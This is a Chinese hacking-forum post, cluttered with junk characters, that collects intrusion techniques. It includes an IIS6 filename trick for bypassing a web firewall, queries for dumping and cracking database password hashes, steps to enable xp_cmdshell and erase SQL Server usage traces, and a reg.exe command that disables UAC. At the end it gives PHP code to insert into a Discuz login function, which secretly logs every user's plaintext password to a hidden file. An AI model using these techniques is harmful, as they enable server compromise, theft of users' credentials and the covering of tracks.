其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录% \2 y3 H, ~- e+ H9 ~; U& t# V3 ], o
利用II6文件解析漏洞绕过安全狗代码:. d, d& S" j( R% d) M; }
;antian365.asp;antian365.jpg2 Q/ l' c$ V# z" R5 q3 L+ E
7 w2 ~( x/ R8 E9 k, X
各种类型数据库抓HASH破解最高权限密码!
) K; |9 C* A; o+ @& C% m1.sql server2000
% C) f3 o u/ F6 I7 a9 \! b0 ]SELECT password from master.dbo.sysxlogins where name='sa'
' e, o! L4 w3 c0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503413 g) w. Y2 R" G+ r
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
/ R3 R/ t; @2 [* r$ E8 B. y
/ G( D; U& t' z* s! z ?0 E0×0100- constant header# S8 u( {. ?: O
34767D5C- salt0 ~, G; a5 ~, h" S1 R5 H* E
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash, E4 G% M+ H& K2 X: w. j% }
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash b& e( O" E. W, ~# D: ~
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
: H Z6 ]! S5 RSQL server 2005:-6 ?# f8 Z8 l" \9 W
SELECT password_hash FROM sys.sql_logins where name='sa'9 B- q4 U8 @+ |
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
6 r9 v+ ? V' G) p$ W2 w! C0×0100- constant header5 P: g5 F* C% v/ K3 a8 R* A2 [
993BF231-salt
' ~# t$ `% B7 O9 W O6 N6 q5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
$ m( k! J( e: G- o2 e6 hcrack case sensitive hash in cain, try brute force and dictionary based attacks.
( N( R% e0 T% u& }$ ?! y
2 B5 j" z' z2 @) oupdate:- following bernardo’s comments:-
& k2 c- p* N0 |0 r' Vuse function fn_varbintohexstr() to cast password in a hex string.' }/ U1 O# B, o8 H" ~+ q
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins# |! q4 d. M" X7 [9 k! G
& [) w/ m2 ]4 s+ y6 @! U9 }# M+ B8 Q
MYSQL:-
/ @: E& `6 h2 F5 y, w" w8 R' P! c2 h8 G
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.( U" `4 k$ C. Z. H5 M% {
0 t* V) `! V# l*mysql < 4.1; S8 P+ y' m, r |' @, ^
. Z* l B1 ?) o+ S) `9 Y
mysql> SELECT PASSWORD(‘mypass’);) U5 p9 V0 D4 m% \2 f- A& d8 {
+——————–++ e& s: q( [3 _$ J- F1 [+ l6 a
| PASSWORD(‘mypass’) |% k* a* v: A' p1 D- D) h+ x5 B
+——————–++ f7 m3 h) a' S) N7 \
| 6f8c114b58f2ce9e |
) b7 X" g" u0 P( m+——————–+/ t+ U" r+ B% R [7 X$ o7 p
* u! x) Z1 t5 Z: e T0 y Q% r*mysql >=4.1: D/ V1 u2 h9 p0 k. j2 c
9 d2 E S J% u5 ]7 d7 t3 @; Jmysql> SELECT PASSWORD(‘mypass’);
: x) ?, _% t2 U% Y! x+——————————————-+
K, y0 M8 w& S. G4 e" |: G6 W| PASSWORD(‘mypass’) |. G$ i6 h7 Q* ?2 h4 {& E+ H
+——————————————-+3 J# R* b& s# O$ V3 U
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |8 E7 `8 @8 s% q+ C* {2 D5 p
+——————————————-+
& Q5 [' }3 z+ Y5 L- m! ~
- v- Q1 U8 d9 F% u5 rSelect user, password from mysql.user
( x& ?: Q# v8 L! l& JThe hashes can be cracked in ‘cain and abel’
; t6 t0 c& C1 g `
0 u/ R( I4 M: e+ E$ v) m2 sPostgres:-
, g% ]! a; a. UPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”): W! ~0 A, ?/ t, ~+ n J, T9 p
select usename, passwd from pg_shadow;2 q/ W% s+ z% \ O
usename | passwd
2 J6 Z$ I8 y. \* ~( W) T——————+————————————-, Z, p i6 p5 M+ F- |- a* ~
testuser | md5fabb6d7172aadfda4753bf0507ed4396( q) I9 V0 D/ v7 s& P! v
use mdcrack to crack these hashes:-
; E- l9 k7 o/ E0 D* j B1 E3 t; f$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
. Q5 m1 T2 e3 B) \& y! X% n
9 L$ h ?2 r0 k5 R$ p4 KOracle:-. R. o/ }" ^3 E4 k, N2 G" c" e
select name, password, spare4 from sys.user$
0 r5 }( S7 Q+ c2 X) }3 E& l4 {hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g$ J9 P0 L1 c9 ^+ {, E+ q# t
More on Oracle later, i am a bit bored….% _- Y- L, F8 j- o, m
0 s+ d" ^- e3 {5 G! f7 ^
# m/ M e5 M2 t8 i
在sql server2005/2008中开启xp_cmdshell
/ k9 V. [/ m% c- c6 `( A: t-- To allow advanced options to be changed.
0 B* X# @8 L6 ?/ p' hEXEC sp_configure 'show advanced options', 1
" w+ D0 ^- z9 @6 ^3 eGO9 U8 L2 \9 [9 t, J) y2 m+ r& ~
-- To update the currently configured value for advanced options.( X6 D( ?" `0 M; ^' i% |7 f4 A
RECONFIGURE
3 ~' P% e) r8 p1 EGO9 X6 k* |: [/ M7 Y. q, d+ I
-- To enable the feature.5 V/ ~3 e$ V/ E5 y% r% U) h3 v
EXEC sp_configure 'xp_cmdshell', 1) W' F& X: O/ R/ g
GO
5 s% V2 J0 C: _' I0 W4 Q-- To update the currently configured value for this feature.
! `5 I( h; y( ]: b+ PRECONFIGURE2 N. q- Y8 G2 w* ?# w( ]
GO. I% Z% \4 X3 t
SQL 2008 server日志清除,在清楚前一定要备份。- h/ l8 _1 b, v5 i% i6 I
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:0 p! ~ V- m7 s3 }: T1 x# @3 |
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin t! p6 q3 }6 S* } b
. ~2 J8 c) b8 }* X, ~6 r! }3 o对于SQL Server 2008以前的版本:
: y; o1 }* B/ u$ j' P+ [SQL Server 2005:! B$ }: x4 p3 D- ^' C$ ?$ j
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
* I: M9 D, L) kSQL Server 2000:
, I( X! u) ]& A: z& d* c5 m清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。5 o/ {4 h2 k+ `% E C3 C
1 }' K# w# }0 P1 m/ `( w* b9 {
本帖最后由 simeon 于 2013-1-3 09:51 编辑
+ M' m: s( f& Z5 N$ I2 g
" p, L4 K7 }% H4 g: B7 n% P8 l) p: x) E* M4 F4 R
windows 2008 文件权限修改' K6 x" d3 O1 j2 g! Z- l* M$ B
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
% o( ~( S! H' L1 H# p2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
8 A+ q+ W! |9 t( b: y" ]3 J一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
# P) F9 C8 a4 R1 \* @1 j4 D
$ l8 `0 f+ x8 x3 h4 T3 cWindows Registry Editor Version 5.00
3 f$ Q0 S% g8 G9 @; b[HKEY_CLASSES_ROOT\*\shell\runas]: z& a) j5 X5 a# U! S: X
@="管理员取得所有权"+ A" m+ Q2 c4 }4 o
"NoWorkingDirectory"=""( r8 A( T' l- x( h3 {
[HKEY_CLASSES_ROOT\*\shell\runas\command]
- G0 Q- u& W) L4 y0 \@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
: q6 C2 z7 R! J"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"" b/ G* N7 T6 o! _! _
[HKEY_CLASSES_ROOT\exefile\shell\runas2]! A) B9 s" d7 V- n4 f
@="管理员取得所有权"
- T: m! ?; `7 Y9 F" Z2 c"NoWorkingDirectory"=""
! l% q; z3 L5 ]# U( U[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
! @. M4 A- B9 k% g0 W* T2 g1 L( b4 P@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
# V. Z0 W% V3 D8 @" W$ m"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
o9 ]2 x; V. B* y s# D& J5 D) ~. y; T P5 f: x& @
[HKEY_CLASSES_ROOT\Directory\shell\runas]8 C: l) R1 l; U4 E
@="管理员取得所有权"
5 A2 ?# P5 r2 U* b2 Z"NoWorkingDirectory"=""
& T3 d, h, v' C[HKEY_CLASSES_ROOT\Directory\shell\runas\command]5 b& P! p6 K, b2 u. \9 u4 A
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
+ _7 Q" Q+ ]' i- S( B. W/ s/ O q% o"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
& O4 z, x) \: C6 n& K) [3 k2 ]* R. w- g& `$ `9 g
' F- ^$ q7 y. V' i" Awin7右键“管理员取得所有权”.reg导入
0 }( r1 f8 f1 }" W; Q" x1 o7 q4 t9 [二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
) T6 F( n. R, ~7 D1、C:\Windows这个路径的“notepad.exe”不需要替换
0 r8 @# v' y% _+ }2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
6 L8 G& U0 ?: C9 \! w+ F# I3、四个“notepad.exe.mui”不要管! J9 T/ C# y5 ^6 g# p
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
# C! @3 `7 w( N$ d& N7 U1 i, d) qC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”3 {% o3 \8 }+ I( @; f( a; N/ |
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
. n/ g- }' Z% o) z# S$ M; e替换完之后回到桌面,新建一个txt文档打开看看是不是变了。' W( M. P' |1 S1 F0 {7 ^. }
windows 2008中关闭安全策略:
- ^( y* [+ c& greg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
$ H: d# A& x3 L5 U8 _修改uc_client目录下的client.php 在 n" J5 r5 R$ v0 g& n
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
% q) E2 s- e/ \) a下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
/ ^ S- E3 ^5 U: D5 m* C% M你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw8 k! A U; u$ T( \* {
if(getenv('HTTP_CLIENT_IP')) {
' m2 t- ? p9 e6 p" o* N$onlineip = getenv('HTTP_CLIENT_IP');
+ W4 h: b! ~ b; V} elseif(getenv('HTTP_X_FORWARDED_FOR')) {" W+ }2 }# @/ p
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
K1 j" B+ J$ H; ]& Q0 U% i Y+ J} elseif(getenv('REMOTE_ADDR')) {
% ^( w4 w) ~. b( |; c0 R$onlineip = getenv('REMOTE_ADDR');
0 H7 k( G' O9 u6 |/ A. w" a. `} else {
* ?. @' n% Y" ~, R# C$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
9 q+ o5 S: ^2 g4 u2 c}" S- [1 S! c2 R( \
$showtime=date("Y-m-d H:i:s");
; \ \7 z) ^' R $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
, W* s P0 t' s" [ $handle=fopen('./data/cache/csslog.php','a+');9 G8 ?8 D2 P2 X' F8 J
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对